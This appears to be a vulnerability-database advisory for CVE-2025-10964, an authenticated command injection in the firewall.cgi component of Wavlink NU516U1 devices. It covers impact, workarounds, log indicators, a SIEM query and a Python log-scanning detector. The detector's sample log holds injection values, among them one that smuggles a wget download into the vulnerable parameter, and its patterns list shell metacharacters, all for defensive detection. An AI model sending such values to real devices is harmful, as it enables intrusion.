CVE-2025-10964

6.3 MEDIUM

📋 TL;DR

This is an OS command injection flaw in the firewall.cgi component of Wavlink NU516U1 devices. An attacker who can reach the device's web interface (and, per the Exploit Status below, log in to it) can embed shell metacharacters in the remoteManagementEnabled parameter and have the device execute arbitrary commands. All users of affected Wavlink NU516U1 devices are at risk; no fix is available.

💻 Affected Systems

Products:
  • Wavlink NU516U1
Versions: All current firmware versions; no fixed version is known (vendor did not respond to disclosure)
Operating Systems: Embedded Linux firmware
Default Config Vulnerable: ⚠️ Yes
Notes: Vulnerability exists in default configuration of the firewall.cgi component.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete device compromise allowing attackers to install persistent backdoors, pivot to internal networks, or use the device for botnet activities.

🟠

Likely Case

Unauthorized command execution leading to device configuration changes, data exfiltration, or denial of service.

🟢

If Mitigated

Limited impact if the management interface is reachable only from trusted hosts (inbound filtering and ACLs), remote management is disabled, and any proxy or WAF in front of the interface rejects shell metacharacters in request parameters. Since no patch exists, these network controls are the only mitigation.

🌐 Internet-Facing: HIGH - Attack can be initiated remotely and exploit is publicly available.
🏢 Internal Only: MEDIUM - Still vulnerable to internal attackers or compromised internal systems.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

A proof of concept is available on GitHub. It requires network access to the device's web interface and a valid login, since the exploit is not unauthenticated.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: UNKNOWN

Vendor Advisory: NONE

Restart Required: No

Instructions:

No official patch is available and the vendor did not respond to disclosure. Replace the device, or keep it behind strict network controls until it can be replaced.

🔧 Temporary Workarounds

Network Segmentation (scope: all)

Isolate Wavlink devices in a separate VLAN with strict firewall rules blocking external access to management interfaces.

Access Control Lists (scope: all)

Implement ACLs to restrict access to the device management interface to trusted IP addresses only.

🧯 If You Can't Patch

  • Disable remote management (WAN-side access to the web interface) if it is not required; this removes the internet-facing attack path but not the flaw itself, which stays reachable from the LAN
  • Replace vulnerable devices with supported alternatives from responsive vendors

🔍 How to Verify

Check if Vulnerable:

Check device model and firmware version. If using Wavlink NU516U1 with unpatched firmware, assume vulnerable.

Check Version:

Check device web interface or console for firmware version information.

Verify Fix Applied:

No verification is possible because the vendor has not provided a patch. Consider device replacement.

📡 Detection & Monitoring

Log Indicators:

  • POST requests to /cgi-bin/firewall.cgi whose remoteManagementEnabled value contains shell metacharacters (; | & ` $( or a newline), in raw or URL-encoded form (%3B, %7C, %26, %60)
  • Unexpected command execution in device logs; consumer firmware rarely records this, so rely on a proxy, IDS or flow telemetry in front of the device rather than on the device itself

Network Indicators:

  • HTTP requests to device management interface from unexpected sources
  • Outbound connections from device to suspicious IPs

SIEM Query:

source="wavlink_device" AND url="/cgi-bin/firewall.cgi" AND param="remoteManagementEnabled" AND (value CONTAINS ";" OR value CONTAINS "|" OR value CONTAINS "&" OR value CONTAINS "`" OR value CONTAINS "$(")

Group the metacharacter terms with parentheses as shown; without them AND binds tighter than OR and the query matches any request whose value contains ";" regardless of URL or parameter. URL-decode the value before matching, otherwise encoded payloads such as %3Bid are missed.
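The following is an added example, not code from the advisory, the vendor, or the public PoC. It implements the detection logic above offline: it walks constructed log lines of the assumed form "<src_ip> <method> <path> <body>", picks out requests to firewall.cgi, URL-decodes the remoteManagementEnabled value (repeatedly, so double-encoded payloads are caught) and flags shell metacharacters. The log layout, the sample lines and the documentation-range addresses are all assumptions.

```python
"""Added example (not from the advisory, vendor or PoC): an offline detector
for CVE-2025-10964-style requests against firewall.cgi.
The "<src_ip> <method> <path> <body>" log layout is an assumption."""
import re
from urllib.parse import unquote_plus

TARGET_PATH = "/cgi-bin/firewall.cgi"
TARGET_PARAM = "remoteManagementEnabled"
# Metacharacters that have no legitimate place in a boolean-style flag.
# Newlines are included because a value passed to a shell via system()
# or popen() is also terminated by a line break.
SHELL_META = re.compile(r"[;|&`$\n\r]")

# Constructed sample input; 203.0.113.0/24 and 198.51.100.0/24 are
# documentation ranges, not real attacker addresses.
SAMPLE_LOG = """\
10.0.0.5 POST /cgi-bin/firewall.cgi remoteManagementEnabled=1&page=apply
203.0.113.9 POST /cgi-bin/firewall.cgi remoteManagementEnabled=1;id&page=apply
203.0.113.9 POST /cgi-bin/firewall.cgi remoteManagementEnabled=1%3Bwget%20http%3A%2F%2F203.0.113.9%2Fx&page=apply
198.51.100.2 POST /cgi-bin/firewall.cgi remoteManagementEnabled=%2560id%2560
10.0.0.7 GET /cgi-bin/firewall.cgi page=view
"""


def parse_body(body: str) -> dict:
    """Split an application/x-www-form-urlencoded body on '&' only.

    Done by hand instead of urllib.parse.parse_qs because older Python
    versions also split on ';', which would hide exactly the separator
    an injection relies on."""
    params = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def normalize(value: str, rounds: int = 3) -> str:
    """Decode repeatedly (bounded) so %3B, %253B, ... all become ';'."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_suspicious(value: str) -> bool:
    """True if the decoded value contains a shell metacharacter."""
    return SHELL_META.search(normalize(value)) is not None


def scan(log_text: str) -> list:
    """Return (src_ip, decoded_value) for each request that looks like an
    injection attempt against remoteManagementEnabled."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split(" ", 3)
        if len(parts) != 4:
            continue  # malformed or body-less line; nothing to inspect
        src, _method, path, body = parts
        if path != TARGET_PATH:
            continue
        for value in parse_body(body).get(TARGET_PARAM, []):
            if is_suspicious(value):
                hits.append((src, normalize(value)))
    return hits


if __name__ == "__main__":
    for src, value in scan(SAMPLE_LOG):
        print(f"ALERT src={src} {TARGET_PARAM}={value!r}")
```

Run it where the request body is actually visible (a reverse proxy, IDS or packet capture in front of the device); the device's own logs are unlikely to contain POST bodies. The bounded repeated decoding is what catches the %2560id%2560 line, which a single-pass CONTAINS match on the raw value would miss.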

🔗 References
